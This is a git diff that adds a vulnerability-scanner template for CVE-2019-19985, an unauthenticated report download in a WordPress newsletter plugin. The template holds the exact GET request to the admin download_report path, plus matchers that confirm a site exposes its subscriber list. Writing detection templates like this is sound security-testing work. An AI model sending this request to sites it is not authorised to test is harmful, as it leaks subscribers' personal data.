diff --git a/cves/CVE-2019-19985.yaml b/cves/CVE-2019-19985.yaml new file mode 100644 index 0000000000..c32623eb86 --- /dev/null +++ b/cves/CVE-2019-19985.yaml @@ -0,0 +1,23 @@ +id: CVE-2019-19985 + +info: + name: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download + author: KBA@SOGETI_ESEC + severity: medium + + # Source:- https://www.exploit-db.com/exploits/48698 + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=download_report&report=users&status=all" + + matchers-condition: and + matchers: + - type: word + words: + - Subscribed + + - type: status + status: + - 200 \ No newline at end of file